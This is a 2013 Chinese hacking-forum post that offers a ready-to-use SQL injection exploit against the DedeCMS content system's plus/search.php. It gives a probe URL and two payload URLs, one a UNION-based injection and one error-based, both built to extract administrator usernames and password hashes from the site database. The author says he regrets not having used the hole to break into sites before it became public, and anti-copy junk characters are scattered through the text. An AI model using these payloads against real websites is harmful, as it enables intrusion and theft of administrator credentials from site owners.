中国网络渗透测试联盟

标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP [打印本页]

作者: admin    时间: 2013-1-21 08:45
标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ1 W) I$ z: T  F# w) O! h$ E
/ x# d3 P9 g( E9 E
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
2 T9 }2 @/ t) m5 d5 k5 P9 m3 _; N& g$ b, U! h
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
; g% U# i; ^8 y" r' r2 o4 Z' V% p1 f: ~( P9 P& i: Q
我一般是这样测试的:$ H* U5 x+ V" b! ]2 J

7 m  n. `0 s2 N/ b' f8 ~! I% k提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
5 S' q* D5 |! d1 ]4 @
. Z6 F& ?3 v, ?2 @转载不加作者名的没JJ5 r" v" j5 N) [/ ^! G
$ Y& E( [( {. E' @, N6 z- \% k5 h7 z
作者:鬼哥
6 c" U& U, P& P( q6 P& _- m& Q; H: _, C+ M' V

6 ^5 t- G* f! J3 W% C% Q
8 j0 r( {& X1 b4 \* ^, n7 u看结果如果提示) G8 N  L: p- O5 x* i

4 B5 [' }% S$ Y6 s& k* F& E' n  {Safe Alert: Request Error step 2 !/ H: n8 |1 g$ v" k

6 U: Z& x& Q1 C1 Z5 S/ l4 C那么直接用下面的exp
; m) h! p7 a/ I, E9 ^1 T
, s. @$ h8 O6 sxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
8 \( \: P8 a' u  U& d  X' ^5 c  F& @0 b; a8 l" m% S- A

( @' ^! H, Q3 Q: `看结果如果提示+ g/ _9 ~# x% R
  `( s. w# X6 o
Safe Alert: Request Error step 1 !# i2 ]+ C) R. B% j5 g% V2 B: j

& J' A  p# l) C" U( S那么直接用下面的exp/ T. }4 g, Q2 \' r/ o
, `, h  x, Z- f8 X
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
( W8 ]8 {& ~! E, R1 K3 H% ~
/ o4 L) K& ?9 a, i) E8 m8 O- ?+ `
如果正常显示证明漏洞不存在了。
* }$ ?; Q0 L  ?- G$ a5 X0 J" H9 `% Q7 w
转载不加作者名的没JJ




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2